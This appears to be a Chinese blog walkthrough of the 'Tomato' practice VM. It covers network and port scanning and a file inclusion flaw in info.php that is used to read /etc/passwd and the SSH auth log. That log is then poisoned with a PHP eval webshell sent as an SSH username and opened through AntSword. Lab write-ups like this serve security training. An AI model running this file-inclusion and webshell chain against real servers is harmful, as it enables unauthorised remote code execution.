Tomato靶机攻略

将tomato改为NAT模式

扫描ip

arp-scan -l

扫描端口,发现ssh服务端口从22改为2211

扫描目录

发现http://192.168.31.134/antibot_image/ 访问

查看所有php文件的源码,看看有什么不同的地方

在info.php的源码中发现问题

在输入后,成功显示,说明文件包含漏洞

info.php?image=/etc/passwd

通过/var/log/auth.log这个在linux中使用的日志文件,成功查看到日志

info.php?image=/var/log/auth.log

使用ssh登录,看日志里会不会出现记录

发现日志中有记录

使用kali,让一句话木马写入日志中

ssh '<?php @eval($_POST[1]);?>'@192.168.31.134 -p 2211,

我的kali写入失败,选择用xshell连接

之后点击连接,当然肯定会失败,日志记录了就可以

使用中国蚁剑连接

相关推荐
Java资深爱好者11 分钟前
如何在Android中实现SQLite数据库操作
android·数据库·sqlite
安 当 加 密17 分钟前
打造Windows服务器安全堡垒:安当SLA双因素认证方案详解
运维·服务器·安全
PH_modest39 分钟前
【Linux跬步积累】—— 网络基础
linux·网络·arm开发
木盏42 分钟前
命令行重启Ubuntu软件
运维·服务器·ubuntu
byte轻骑兵1 小时前
嵌入式 ARM Linux 系统构成(6):应用层(Application Layer)
linux·arm开发·嵌入式软件开发
牛牪犇01 小时前
如何搭建一个适配微信小程序,h5,app的uni-app项目
前端·微信小程序·小程序·前端框架
沐墨专攻技术1 小时前
初识Linux
linux·服务器
LKAI.1 小时前
MongoDB备份与还原
linux·数据库·mongodb
祈澈菇凉1 小时前
React 中如何实现表单的受控组件?
前端·javascript·react.js
hnlgzb1 小时前
安卓应用架构模式 MVC MVP MVVM有什么区别?
android·架构·mvc